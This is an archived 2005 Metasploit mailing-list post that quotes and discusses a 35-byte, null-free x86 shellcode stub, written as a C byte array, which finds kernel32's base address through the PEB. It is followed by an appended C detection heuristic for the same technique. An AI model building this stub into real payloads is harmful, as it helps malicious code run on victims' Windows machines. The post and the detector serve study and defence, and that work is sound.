Metasploit mailing list archives

Windows 9x/NT/2k/XP PEB method 35 bytes


From: mmiller at hick.org (mmiller at hick.org)
Date: Sun, 9 Jan 2005 14:12:46 -0600

On Sun, Jan 09, 2005 at 08:52:13PM +0100, Jerome ATHIAS wrote:
/*This is a 35 byte C implementation of the use of the PEB method to get
*the kernel32 base address on Windows. This is generic code designed to
*run on both Windows 9x and NT based systems. The code has been optimized
*to not have any 00h bytes so that you won't have to use an XOR routine to
*encode the shellcode. I used relative jumps and xor tricks to avoid the
*00h bytes and make the code as small as I could get it. Feel free to use
*this source in anything that you want.
*/

Credit should be given where credit is due.  This approach for looking
up the kernel32 base address has been in use for quite some time.  To my
knowledge dino from LSD and the VX scene were the first to make use of
this technique.
 
/* 35 byte PEB method for Windows 9x/NT/2k/XP
*  0x00 byte optimized, no XOR routine required.
*
*  www.4x10m.com
*  oc.192
*  irc.4x10m.net #4x10m
*/

unsigned char shellcode[] =
/*  35 byte PEB - 00h removal and size optimized  */
/*      22 - 24 total clock cycles on a x486      */
"\x31\xC0"                  /* xor eax, eax       */
"\x31\xD2"                  /* xor edx, edx       */
"\xB2\x30"                  /* mov dl, 30h        */
"\x64\x8B\x02"              /* mov eax, [fs:edx]  */      /* PEB base address, read via fs:[30h] */
"\x85\xC0"                  /* test eax, eax      */
"\x78\x0C"                  /* js 0Ch             */      /* sign bit set: 9x PEB, take the 9x path */
"\x8B\x40\x0C"              /* mov eax, [eax+0Ch] */      /* NT kernel32 routine: PEB->Ldr */
"\x8B\x70\x1C"              /* mov esi, [eax+1Ch] */      /* InInitializationOrderModuleList.Flink */
"\xAD"                      /* lodsd              */      /* advance to the second entry (kernel32) */
"\x8B\x40\x08"              /* mov eax, [eax+08h] */      /* DllBase of that entry */
"\xEB\x07"                  /* jmp short 09h      */      /* skip the 9x path */
"\x8B\x40\x34"              /* mov eax, [eax+34h] */      /* 9x kernel32 routine */
"\x8D\x40\x7C"              /* lea eax, [eax+7Ch] */
"\x8B\x40\x3C"              /* mov eax, [eax+3Ch] */
;

The above code can be optimized by a number of bytes (at least 3) and
still avoid NULL bytes.  Please reference some of the win32 payloads 
included in metasploit or search for 'PEB resolution' on google to see
how.
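As an added example that is not part of either post, the following hypothetical C heuristic shows what a scanner can key on to spot this technique in a captured buffer: the read of fs:[30h] (the PEB pointer), both in its direct disp32 encoding and in the null-free register-indirect form used above. The sample buffers are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical heuristic (added example): return the offset of the first
 * read of fs:[30h] in a byte buffer, or -1. Two encodings are recognised:
 *   (a) mov eax,fs:[30h] -> 64 A1 30 00 00 00, or mov r32,fs:[30h] -> 64 8B /r disp32
 *   (b) the null-free form above: 30h moved into an 8-bit register (B0+r 30)
 *       and dereferenced through fs:[reg] (64 8B, modrm mod=00) within WINDOW
 *       bytes. Only al/cl/dl/bl (r<4) alias the low byte of eax..ebx. */
#define WINDOW 8

static int fs_disp32_30(const uint8_t *p, size_t n) {
    if (n >= 6 && p[0] == 0x64 && p[1] == 0xA1 &&
        p[2] == 0x30 && p[3] == 0 && p[4] == 0 && p[5] == 0) return 1;
    /* modrm mod=00 rm=101 means [disp32]; the reg field may be anything */
    if (n >= 7 && p[0] == 0x64 && p[1] == 0x8B && (p[2] & 0xC7) == 0x05 &&
        p[3] == 0x30 && p[4] == 0 && p[5] == 0 && p[6] == 0) return 1;
    return 0;
}

static int fs_read_via_reg(const uint8_t *p, size_t n, int reg) {
    /* mod=00, rm=reg; reg<4 already excludes the SIB (100) and disp32 (101) forms */
    return n >= 3 && p[0] == 0x64 && p[1] == 0x8B &&
           (p[2] >> 6) == 0 && (p[2] & 7) == reg;
}

long find_peb_read(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (fs_disp32_30(buf + i, len - i)) return (long)i;
        if (len - i < 2 || (buf[i] & 0xFC) != 0xB0 || buf[i + 1] != 0x30) continue;
        int reg = buf[i] & 3;                  /* B0..B3: al, cl, dl, bl */
        for (size_t j = i + 2; j < len && j < i + 2 + WINDOW; j++)
            if (fs_read_via_reg(buf + j, len - j, reg)) return (long)i;
    }
    return -1;
}

/* Constructed samples: the opening instructions of the shellcode above behind
 * two NOPs, a classic direct PEB read, and a benign mov dl,30h that never touches fs. */
const uint8_t SAMPLE_NULLFREE[] = {0x90,0x90,0x31,0xC0,0x31,0xD2,0xB2,0x30,0x64,0x8B,0x02,0x85,0xC0};
const uint8_t SAMPLE_DIRECT[]   = {0x55,0x64,0xA1,0x30,0x00,0x00,0x00,0xC3};
const uint8_t SAMPLE_BENIGN[]   = {0xB2,0x30,0x90,0x90,0xC3};

int main(void) {
    printf("null-free: %ld\n", find_peb_read(SAMPLE_NULLFREE, sizeof SAMPLE_NULLFREE));
    printf("direct:    %ld\n", find_peb_read(SAMPLE_DIRECT, sizeof SAMPLE_DIRECT));
    printf("benign:    %ld\n", find_peb_read(SAMPLE_BENIGN, sizeof SAMPLE_BENIGN));
    return 0;
}
```

The register-indirect check is a window heuristic: a mov to the register between the two instructions would defeat it, so treat a hit as a trigger for disassembly rather than a verdict.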
